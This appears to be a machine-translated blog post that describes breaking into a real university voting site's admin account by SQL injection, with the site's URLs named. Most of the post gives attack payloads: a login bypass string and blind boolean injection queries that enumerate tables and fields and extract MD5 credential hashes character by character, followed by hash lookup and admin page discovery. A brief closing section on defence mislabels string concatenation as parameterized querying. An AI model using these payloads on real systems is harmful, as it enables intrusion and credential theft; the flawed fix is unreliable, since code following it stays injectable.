We know that the website background needs to verify the user input. If this is not done, the user can even enter some SQL statements to operate the background database. Such a fun thing has never been really experienced. A few days ago, the School held a "your favorite counselor" voting activity. The website was estimated to be for a student team. As a result, the student cracked the Administrator account and password of the website, I asked him about the principle, learned about the steps to crack the attack, and practiced it again. thanks to Jing, I don't know this, nor can I have this blog.
The website address cracked in this article is http://xgc.nuist.edu.cn/vote/vote_login.asp. after the activity, the website cannot be opened, or the students who write the website may realize the severity of the vulnerability and correct it. Therefore, the content in this article does not apply to this website. I have sorted out the detailed cracking process and shared it with you. The logic in this article is strong and you need to read it with patience. however, the text is about the cracking steps and is a general idea. If you have any questions, please leave a message and we will discuss it :)
Whether a website has the SQL Injection Vulnerability
A website generally contains a user table (user name and password) and an administrator information table (Administrator name and password). After you enter the user name and password, an SQL statement is executed in the background, check whether there is a corresponding user AND password. For example, SELECT * FROM SomeTable WHERE UserName = '$ username' AND pwd =' $ pwd '. If this statement returns true, then the login operation is complete.
Imagine if you enter 'or' = 'or' in the student ID and Password text box and submit it, the preceding SQL statement becomes SELECT * FROM SomeTable WHERE UserName = ''or '= 'or' AND pwd ='' or' = 'or '', this statement becomes a logical expression, which contains several segments:
- SELECT * FROM SomeTable WHERE UserName = ''(false)
- Or
- '=' (True)
- Or
- ''(False)
- And
- Pwd = ''(false)
- Or
- '=' (True)
- Or
- ''(False)
Finally, the entire logical expression is 0 | 1 | 0 & 0 | 1 | 0. The result is true (when "0 | 1 |... "When the entire expression ellipsis is not counted, because" or "is already true), so you can log on successfully, in fact, also logged on successfully.
Ii. Principle of cracking the background database
Enter 'or' = 'or' in the username and password text box. As of step 1 shown above, the expression value is true because there is a "or ", so no matter what the expression is after this, "True or false" "True or true" is true. the key is the '=' in the middle of 'or' = 'or', '=' indicates a character, always true. if we change the '=' to an SQL expression, if the expression is true, the entire expression is true.
The following steps require that the same text be entered in the user name and password text box because: the background statement format may be SELECT * FROM SomeTable WHERE UserName = '$ username' AND pwd =' $ pwd ', it may also be SELECT * FROM SomeTable WHERE pwd = '$ pwd' AND UserName =' $ username'. In either case, as long as the user name and password are entered in the same text, as long as the SQL expression contained in the text is true, the entire expression is true. another advantage of writing is that it is convenient to copy and paste data.
Write some SQL expressions to test the content in the database at once.
3. Obtain the table name of the background database
If you replace the expression with (select count (*) FROM Table Name) <> 0, this expression is used to obtain the number of records in a table, you need to guess what the table name is. If you have guessed it, the number of records in the table will certainly not be equal to 0. Then the value of this expression is true. the common table names are the same. One by one, we try to find a table named admin. Its fields are not empty. obviously, this table is used to store administrator information.
4. Obtain the field name of the background database table
Now we know that this table is called admin. Next we will try to get the fields in this table.
Replace the expression with (select count (*) FROM admin where len (field name)> 0) <> 0. This expression is used to test whether the table admin contains this field. LEN (field name)> 0 indicates that the length of this field is greater than 0. If this field exists, LEN (field name)> 0 is always true. if this field is included, the number returned by the entire SELECT statement is certainly not 0, that is, the entire expression is true, and the field name is obtained.
Based on this method, three key fields are obtained: id, admin, and pass.
5. Obtain the length of a field
The obtained information is that there is an admin table with the id, admin, and pass fields. the user name and password are stored in the background. The common practice is to store the values (32-bit) after MD5 encryption. Now let's test whether this is the case.
Replace the expression with (select count (*) FROM admin where len (field name) = 32) <> 0. The result of replacing admin and pass with true is true, it indicates that the background storage Administrator account and password use the encrypted 32-bit field.
6. Obtain the Administrator account and password
The MD5 encrypted string contains 32 characters and may only consist of 0-9 and A-F characters.
1. Get the Administrator account
Change the expression to (select count (*) FROM admin where left (admin, 1) = 'A')> 0, which means I guess the first character of an adimin account is, if yes, the expression is true. if the failure, replace A with 0-9 and any character in the B-F to continue the test, know the success. if it succeeds, I will continue to guess the second character of this account. If the first character is 5, I guess the second character is A, then change the expression to (SELECT COUNT (*) FROM admin where left (admin, 2) = '5a ')> 0. in the string, 1 in the LEFT () function is changed to 2. In addition, the LEFT two characters of the '5a 'code are 5A, 5 of which are determined. in this way, we repeatedly guess until we get the entire 32-bit MD5 encrypted string.
2. Get the id corresponding to this account
Why do I need to obtain the corresponding id of this account? The reason is as follows: You can obtain the account and password according to the previous one, but a table can contain several administrator accounts and passwords. How can this problem be solved? You need to use id. One id corresponds to one record, and one record has only one matching account and password.
Change the expression to (select count (*) FROM admin where left (admin, 1) = '5' AND id = 1)> 0, assume that the first character of an account is 5. If "AND id = 1" in this expression is correct, the account id is 1. if it is not 1, replace it with other numbers one by one.
3. Get the password of the account
Now you have guessed the account of an administrator and know the corresponding id (assuming it is 4). Now you only need to get the password recorded in this record. similarly, change the expression to (select count (*) FROM admin where left (pass, 1) = 'A' AND id = 4)> 0, note that id 4 is already known. The method for getting an Administrator account is as follows. finally, we can get a 32-bit MD5 encrypted string (password ).
* Note:If it is too troublesome to manually obtain each character, you can use C # To write a program, simulate logon, and quickly get the result by controlling a loop.
7. Convert the account and password encrypted by MD5 to plaintext
Some website databases on the Internet store massive (trillions of lines) of plaintext corresponding to the MD5 encrypted dark text, you only need to enter the MD5 encrypted string you need to search for to view what the plaintext is.
8. Search for the website Administrator Logon page
If you can't find the administrator login interface, even now you have an administrator account and password also can not log on. For this website, the address provided to ordinary students login is http://xgc.nuist.edu.cn/vote/vote_login.asp.
Guess and know that the Administrator's logon address is probably a http://xgc.nuist.edu.cn/vote/login.asp, in fact it is.
9. log on to the website background
10 Summary
Let's take a look at the security of this website...
How do I verify user input?The simplest method is to filter out the 'symbol entered by the user. in addition, you can query databases by parameters, such as SELECT * FROM SomeTable WHERE UserName = '"& UserName &"' AND pwd = '"& pwd &"', instead of directly inserting user input information into database query statements. if you want to increase the difficulty of cracking, you can also request a verification code when logging on...
The earth is too dangerous. The above statements are used to obtain the desired information. If you enter a drop table command, the consequences are unimaginable! Pay attention to these problems when you are doing your own website.
Edit recommendations]